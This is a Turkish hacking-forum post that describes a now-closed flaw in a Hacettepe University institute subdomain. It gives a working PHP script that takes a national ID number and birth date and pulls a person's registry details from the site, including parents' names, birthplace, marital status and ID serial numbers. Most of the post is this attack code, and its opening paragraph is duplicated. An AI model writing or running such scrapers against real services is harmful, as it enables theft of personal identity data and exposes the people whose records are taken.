- 16 May 2021
- 35
- 7
Açık şu an aktif değildir konu da bilgilendirmek için açılmıştır! Herhangi bir zarar asla verilmemektedir. Bilginize!!!
Eskiden hacettepe üniversitesi ensitütü adlı subdomaininde öğrenci hesabı açıldığında noredirect açığı sayesinde personellerin eriştiği bir bölgeye erişebiliyorduk. Peki bu nasıl oluyordu gelin inceleyelim.
URL: https://enstitu.hacettepe.edu.tr/aday/crud!bilgiGetir.action?yerli_kimlik_tc_kimlik_no=tc kimlik numarası giriliyor&aday_ad=random&aday_soyad=random&yerli_kimlik_dogum_tarih=doğum tarihi giriliyor
PHP ile gösterecek olursak kod şu şekilde olur:
Eskiden hacettepe üniversitesi ensitütü adlı subdomaininde öğrenci hesabı açıldığında noredirect açığı sayesinde personellerin eriştiği bir bölgeye erişebiliyorduk. Peki bu nasıl oluyordu gelin inceleyelim.
URL: https://enstitu.hacettepe.edu.tr/aday/crud!bilgiGetir.action?yerli_kimlik_tc_kimlik_no=tc kimlik numarası giriliyor&aday_ad=random&aday_soyad=random&yerli_kimlik_dogum_tarih=doğum tarihi giriliyor
PHP ile gösterecek olursak kod şu şekilde olur:
PHP:
<?php
// Yaman Karaman ~ turkhackteam.org
header("Content-Type: application/json; utf-8;");
$auth = "turkhackteam";
if($_GET['auth'] != $auth) {
echo json_encode(array('success' => false, 'auth' => 'Yaman Karaman', 'message' => 'auth key yanlis'));
die(); }
$tc = $_POST['tc'];
$dogum = $_POST['dogum'];
$url = "https://enstitu.hacettepe.edu.tr/aday/crud!bilgiGetir.action?yerli_kimlik_tc_kimlik_no=$tc&aday_ad=asd&aday_soyad=asd&yerli_kimlik_dogum_tarih=$dogum";
$agent = 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"ayricalik=ad,soyad,baba_adi,ana_adi,mahalle,medeni_hal,cinsiyet,dogum_tarih,cilt_no,aile_sira_no,sira_no,dogum_yer,il_pk,il_ad,ilce_pk,ilce_ad,seri_no,seri,no,seri,no");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
$curl_scraped_page = curl_exec($ch);
curl_close($ch);
$jsonturkhackteamcikti = json_decode($curl_scraped_page, true);
echo json_encode(array("success" => "true","auth" => "Yaman Karaman", "data" => $jsonturkhackteamcikti["adayList"]));
?>